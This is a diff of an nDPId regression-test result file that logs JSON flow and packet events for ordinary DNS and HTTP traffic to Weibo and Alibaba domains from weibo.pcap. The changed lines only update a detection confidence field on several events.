00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072333,"flow_last_seen":1463089072333,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1463089072333,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1463089072333,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1463089072333,"pkt":"kDVu60UQeJKcD6iOCABFAAA9J7BAAEARj0XAqAFpwKgBAdEnADUAKd+0rc0BAAABAAAAAAAAA2ltZwF0BnNpbmFqcwJjbgAAAQAB"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072333,"flow_last_seen":1463089072333,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1463089072333,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072333,"flow_last_seen":1463089072333,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1463089072333,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1463089072444,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1463089072444,"pkt":"eJKcD6iOkDVu60UQCABFAACxAABAAEARtoHAqAEBwKgBaQA10ScAnYbirc2BgAABAAUAAAAAA2ltZwF0BnNpbmFqcwJjbgAAAQABwAwABQABAAAAAAAHBHdjZG7AEsAtAAUAAQAAACoAFQZzaW5hanMFY3NnbGIFdHhjZG7AGcBAAAUAAQAABBMAFAhuNGNzd2hrMwVnY2NkbgNuZXQAwGEAAQABAAAABAAEXbyG9sBhAAEAAQAAAAQABF28hvE="} -00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1463089072444,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}} +00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1463089072444,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8AXdAAEAGkoHAqAFpXbyG9ovbAFCLeghvAAAAAKACchAFvgAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -73,27 +72,27 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0fCpAAEAGF9bAqAFpXbyG9ovcAFB8ZHUyz0aFDoAQAOXm+gAAAQEICgBBCR8Ddgkr"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi90SpJVX19aTZ6AS\/\/\/r1QAAAgQFqAQCCAoDdgksAEEJGAEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0mn9AAEAG+YDAqAFpXbyG9ovdAFDX1pNnEqSVWIAQAOUZqgAAAQEICgBBCR8Ddgks"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1463089072471,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/base\/frame.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/combination\/comb_login.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/skin\/default\/skin.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1463089072471,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/base\/frame.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/combination\/comb_login.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/skin\/default\/skin.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072885,"flow_last_seen":1463089072885,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089072885,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1463089072885,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072885,"pkt":"kDVu60UQeJKcD6iOCABFAAA8J\/lAAEARjv3AqAFpwKgBAaGIADUAKAcnK+gBAAABAAAAAAAAAmpzAXQGc2luYWpzAmNuAAABAAE="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072885,"flow_last_seen":1463089072885,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089072885,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072885,"flow_last_seen":1463089072885,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089072885,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073286,"flow_last_seen":1463089073286,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1463089073286,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1463089073286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1463089073286,"pkt":"kDVu60UQeJKcD6iOCABFAABDKCFAAEARjs7AqAFpwKgBAUZzADUAL2deWFEBAAABAAAAAAAAAnUxA2ltZwZtb2JpbGUEc2luYQJjbgAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073286,"flow_last_seen":1463089073286,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1463089073286,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073286,"flow_last_seen":1463089073286,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1463089073286,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1463089073287,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1463089073287,"pkt":"kDVu60UQeJKcD6iOCABFAAA\/KCJAAEARjtHAqAFpwKgBAcXQADUAK4SVO9YBAAABAAAAAAAABmFjanN0YgZhbGl5dW4DY29tAAABAAE="} -00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1463089073287,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1463089073287,"pkt":"kDVu60UQeJKcD6iOCABFAAA6KCNAAEARjtXAqAFpwKgBAcjwADUAJqqk8RABAAABAAAAAAAAAWcGYWxpY2RuA2NvbQAAAQAB"} -00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1463089073287,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073287,"pkt":"kDVu60UQeJKcD6iOCABFAAA8KCRAAEARjtLAqAFpwKgBAdDaADUAKHiskZsBAAABAAAAAAAAA2xvZwZtbXN0YXQDY29tAAABAAE="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"log.mmstat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 